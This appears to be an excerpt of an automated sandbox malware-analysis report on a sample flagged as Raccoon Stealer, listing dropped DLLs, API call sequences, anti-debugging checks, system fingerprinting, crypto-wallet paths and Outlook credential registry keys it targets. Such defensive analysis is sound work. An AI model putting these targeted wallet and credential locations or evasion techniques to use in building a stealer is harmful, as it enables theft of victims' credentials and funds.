Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll
Source: C:\Users\user\Desktop\31cGYywxgy.exe Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll
Is looking for software installed on the system
Source: C:\Users\user\Desktop\31cGYywxgy.exe Registry key enumerated: More than 151 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00437819 __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_00437819
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043EFDD FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError, 0_2_0043EFDD
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWen-USn

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045C559 IsDebuggerPresent,OutputDebugStringW, 0_2_0045C559
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_0042A2F9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00433882 __EH_prolog,DeleteFileA,CreateFileA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetFileSize,GetProcessHeap,HeapAlloc,lstrlenA,lstrlenA,lstrcpynA,lstrcpynA,lstrlenA,lstrcpynA,ReadFile,lstrlenA,lstrcpynA,WinHttpSetOption,WinHttpSetOption,WinHttpSetOption,WinHttpConnect,WinHttpConnect,WinHttpOpenRequest,WinHttpOpenRequest,WinHttpSendRequest,WinHttpReceiveResponse,WinHttpQueryDataAvailable,WinHttpReadData,WinHttpCloseHandle,WinHttpCloseHandle,CloseHandle,DeleteFileA,WinHttpCloseHandle,GetProcessHeap,HeapFree, 0_2_00433882
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A03D mov eax, dword ptr fs:[00000030h] 0_2_0045A03D
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A081 mov eax, dword ptr fs:[00000030h] 0_2_0045A081
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0045A0B2 mov eax, dword ptr fs:[00000030h] 0_2_0045A0B2
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00446625 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00446625

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 0_2_0042C383
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA, 0_2_00437819
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 0_2_00462391
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_00458577
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW, 0_2_0046258C
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_0046267E
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_00462633
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: EnumSystemLocalesW, 0_2_00462719
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 0_2_004627A4
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: GetLocaleInfoW, 0_2_004629F7
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_00440985 cpuid 0_2_00440985
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0043E03E GetLocalTime,SystemTimeToFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, 0_2_0043E03E
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_004371FA __EH_prolog,GetUserNameA,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor, 0_2_004371FA
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042A2F9 GetVersionExW,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary, 0_2_0042A2F9
Source: C:\Users\user\Desktop\31cGYywxgy.exe Code function: 0_2_0042C383 __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,Sleep,GetUserNameA,Sleep,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,StrToIntA,CreateThread,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,lstrlenA,lstrlenA,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize, 0_2_0042C383

Stealing of Sensitive Information:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR
Found many strings related to Crypto-Wallets (likely being stolen)
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: Electrum-LTC;26;Electrum-LTC\wallets;*;|
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: ElectronCash;26;ElectronCash\wallets;*;|
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: Jaxx;26;Jaxx;*;*cache*
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: ;26;exodus
Source: 31cGYywxgy.exe, 00000000.00000002.282340481.0000000000738000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\31cGYywxgy.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Remote Access Functionality:

Yara detected Raccoon Stealer
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.31cGYywxgy.exe.2220000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.2120e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.31cGYywxgy.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.280132470.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.257211865.0000000002220000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.282454454.0000000002120000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 31cGYywxgy.exe PID: 3104, type: MEMORYSTR